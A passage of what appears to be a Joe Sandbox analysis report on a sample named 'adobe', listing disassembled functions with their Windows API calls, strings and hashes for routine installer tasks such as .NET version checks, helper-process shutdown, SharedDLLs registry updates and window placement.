                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458D89
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458DF0
                                                                                                                                                          Strings
                                                                                                                                                          • v1.1.4322, xrefs: 00458DE2
                                                                                                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458CD2
                                                                                                                                                          • v2.0.50727, xrefs: 00458D7B
                                                                                                                                                          • .NET Framework version %s not found, xrefs: 00458E29
                                                                                                                                                          • .NET Framework not found, xrefs: 00458E3D
                                                                                                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458DA3
                                                                                                                                                          • v4.0.30319, xrefs: 00458D11
                                                                                                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458D3C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$Open
                                                                                                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                          • API String ID: 2976201327-446240816
                                                                                                                                                          • Opcode ID: e8abb9de601dfac2494a4b091894a856567b4a1817208a27788f0afb3686d769
                                                                                                                                                          • Instruction ID: 65063e084591066ce2e0c419d93be5946fd3b49884627cc027c606e1205e1d1a
                                                                                                                                                          • Opcode Fuzzy Hash: e8abb9de601dfac2494a4b091894a856567b4a1817208a27788f0afb3686d769
                                                                                                                                                          • Instruction Fuzzy Hash: 3051D331B041485BCB00DB65C861BEE77B6DB99305F14447FE841EB393DE399A0E8B59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00458264 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0045829B
                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004582B7
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004582C5
                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004582D6
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045831D
                                                                                                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458339
                                                                                                                                                          Strings
                                                                                                                                                          • Helper process exited., xrefs: 004582E5
                                                                                                                                                          • Helper process exited, but failed to get exit code., xrefs: 0045830F
                                                                                                                                                          • Helper isn't responding; killing it., xrefs: 004582A7
                                                                                                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458303
                                                                                                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045828D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                          • API String ID: 3355656108-1243109208
                                                                                                                                                          • Opcode ID: 009d5d7fe30976ddb6fc04617b2b071a5728475597fcbc42deffdd3f0bb584b8
                                                                                                                                                          • Instruction ID: dc7ec4cbf56dd0ff1cdd26c76f1a2b05d86ae8be78efecc4f770631db0154fcf
                                                                                                                                                          • Opcode Fuzzy Hash: 009d5d7fe30976ddb6fc04617b2b071a5728475597fcbc42deffdd3f0bb584b8
                                                                                                                                                          • Instruction Fuzzy Hash: 392141706047409AC720E7B9C44675B76D4AF48B05F048C6FFC99E7693DE79E8488B2A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00453A54 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C2B,?,00000000,00453CEF), ref: 00453B7B
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C2B,?,00000000,00453CEF), ref: 00453CB7
                                                                                                                                                            • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                                                                          Strings
                                                                                                                                                          • RegCreateKeyEx, xrefs: 00453AEF
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A93
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AC3
                                                                                                                                                          • , xrefs: 00453ADD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                          • API String ID: 2481121983-1280779767
                                                                                                                                                          • Opcode ID: 1c96cb360d357776079731774428d6af5218f8575bd7d68359ec7f43235e6ed0
                                                                                                                                                          • Instruction ID: 0ff8758d0f3d0f8af8441e1c96d3f3007b0bafa02c42e47a0c64eaf9a54c5f26
                                                                                                                                                          • Opcode Fuzzy Hash: 1c96cb360d357776079731774428d6af5218f8575bd7d68359ec7f43235e6ed0
                                                                                                                                                          • Instruction Fuzzy Hash: 31810076A00209AFDB01DFD5C941BDEB7B9EB48345F50442AF901F7282D778AA09CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004952B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00452F2C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045301B
                                                                                                                                                            • Part of subcall function 00452F2C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045302B
                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049532D
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00495481), ref: 0049534E
                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,00495490,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495375
                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00494B08), ref: 00495388
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000,STATIC,00495490), ref: 004953B8
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049542C
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000), ref: 00495438
                                                                                                                                                            • Part of subcall function 0045327C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363
                                                                                                                                                          • 73A25CF0.USER32(?,0049545B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000,STATIC), ref: 0049544E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                                          • API String ID: 170458502-2312673372
                                                                                                                                                          • Opcode ID: a913bacd68a58272c035a82af8518fd51e71e9d51dfe920310d04365532cd433
                                                                                                                                                          • Instruction ID: 8708ddcb3c7e509e39ae52b682c63ff85e573034b813b33c283b53b7944ce28b
                                                                                                                                                          • Opcode Fuzzy Hash: a913bacd68a58272c035a82af8518fd51e71e9d51dfe920310d04365532cd433
                                                                                                                                                          • Instruction Fuzzy Hash: 32415470A40604AFDF01EBA5DC42F9E7BF8EB09704F614576F500FB292D6799E008BA8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E340 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CDF8,00000000), ref: 0042E369
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CDF8,00000000), ref: 0042E3BD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseHandleModuleProc
                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$}VE
                                                                                                                                                          • API String ID: 4190037839-505153273
                                                                                                                                                          • Opcode ID: 449d0e82435028d71b7d3d804bdb68d3fdc406a7c7eaefde65f99a221eb7a07a
                                                                                                                                                          • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                                                                                          • Opcode Fuzzy Hash: 449d0e82435028d71b7d3d804bdb68d3fdc406a7c7eaefde65f99a221eb7a07a
                                                                                                                                                          • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00462218 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetActiveWindow.USER32 ref: 00462224
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462238
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462245
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462252
                                                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 0046229E
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004622DC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                          • API String ID: 2610873146-3407710046
                                                                                                                                                          • Opcode ID: 7c2f70d3bf3664aadd6cc9b4ea22b92f8e7403f68fa1d74490619f0945ddb7ea
                                                                                                                                                          • Instruction ID: 76099a4312c52d0ccda9152c7cb495629c71abad9852ec9ac162fd6c7ff83c4b
                                                                                                                                                          • Opcode Fuzzy Hash: 7c2f70d3bf3664aadd6cc9b4ea22b92f8e7403f68fa1d74490619f0945ddb7ea
                                                                                                                                                          • Instruction Fuzzy Hash: BF21D775701B046BD310D664CD51F3B3395EB84714F08456AF984DB392EAB8DC008B9E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042EFFC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetActiveWindow.USER32 ref: 0042F008
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                          • API String ID: 2610873146-3407710046
                                                                                                                                                          • Opcode ID: f94b587d3163664f08296e8e66d4ea1cca2761d86ecc9a78ac1a813879e59919
                                                                                                                                                          • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                                                                                                          • Opcode Fuzzy Hash: f94b587d3163664f08296e8e66d4ea1cca2761d86ecc9a78ac1a813879e59919
                                                                                                                                                          • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045843C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045861B,?,00000000,0045867E,?,?,02333858,00000000), ref: 00458499
                                                                                                                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000,00000001,00000000,00000000,00000000,0045861B), ref: 004584F6
                                                                                                                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000,00000001,00000000,00000000,00000000,0045861B), ref: 00458503
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045854F
                                                                                                                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458589,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000), ref: 00458575
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00458589,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004585B0,?,00000000), ref: 0045857C
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                                                          • String ID: CreateEvent$TransactNamedPipe
                                                                                                                                                          • API String ID: 2182916169-3012584893
                                                                                                                                                          • Opcode ID: 62687ccf4654ca9d71a0da89f230f01d7b8f7d759262e3146565ef7b38a810dd
                                                                                                                                                          • Instruction ID: 833dc3b8b07b8aac3dc6316824f20e9e6236f4ec1b001489005bcbcce005ffc2
                                                                                                                                                          • Opcode Fuzzy Hash: 62687ccf4654ca9d71a0da89f230f01d7b8f7d759262e3146565ef7b38a810dd
                                                                                                                                                          • Instruction Fuzzy Hash: ED418375A00608FFDB15DF95C981F9EB7F8EB48714F10406AF904E7292DA78DE44CA68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00456018 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045617D,?,?,00000031,?), ref: 00456040
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456046
                                                                                                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456093
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                                                          • API String ID: 1914119943-2711329623
                                                                                                                                                          • Opcode ID: 02d74b974742779c9eba2f86e197c7bee5317770a2e1002d4043483d3a57369f
                                                                                                                                                          • Instruction ID: fd543e9f45e6c9c7d3ae9c39d990c3b16e81fcc474a24b8266df5fe5801867fa
                                                                                                                                                          • Opcode Fuzzy Hash: 02d74b974742779c9eba2f86e197c7bee5317770a2e1002d4043483d3a57369f
                                                                                                                                                          • Instruction Fuzzy Hash: 8E319471A00A04AFDB01EFAACD51D6BB7BAEB89B117528466F804D3653DA38DD04C768
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                                                                                          • SaveDC.GDI32(?), ref: 00416E37
                                                                                                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                                                                                          • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                                                                                          • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00416F32
                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                                                                                          • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 375863564-0
                                                                                                                                                          • Opcode ID: 6cccffc3355cba574b9c3bb7a3869f970cd619d04b1e686754c1b9faace0ec80
                                                                                                                                                          • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                                                                                          • Opcode Fuzzy Hash: 6cccffc3355cba574b9c3bb7a3869f970cd619d04b1e686754c1b9faace0ec80
                                                                                                                                                          • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
